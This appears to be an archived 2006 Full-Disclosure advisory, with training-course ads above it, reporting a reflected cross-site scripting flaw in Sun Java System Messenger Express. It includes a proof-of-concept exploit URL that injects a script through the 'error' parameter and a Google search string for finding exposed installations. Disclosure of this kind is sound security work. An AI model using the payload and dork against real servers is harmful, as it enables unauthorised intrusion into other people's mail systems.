Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]

[Full-disclosure] Sun java System Messenger Express XSS

Subject: [Full-disclosure] Sun java System Messenger Express XSS
Date: Tue, 31 Oct 2006 05:20:11 +0100
Sun java System Messenger Express
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
29 November 2006
MorX security research team
www.morx.org

Description:
Sun java System Messenger Express XSS

The index script  is vulnerable to XSS attacks, in functiion errorHTML .

function errorHTML() {
 var s=''
 .
 .
 .

 document.write(s) ---> Need more case filetring the 's' var
}


So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.

Exploit:
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E

Founded with Google by this dorks :
intitle:"Sun Java(tm) System Messenger Express"

Vulnerable versions :
Sun java System Messenger Express
Sun java System Messenger Express6
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Sun java System Messenger Express XSS, handrix cobra <=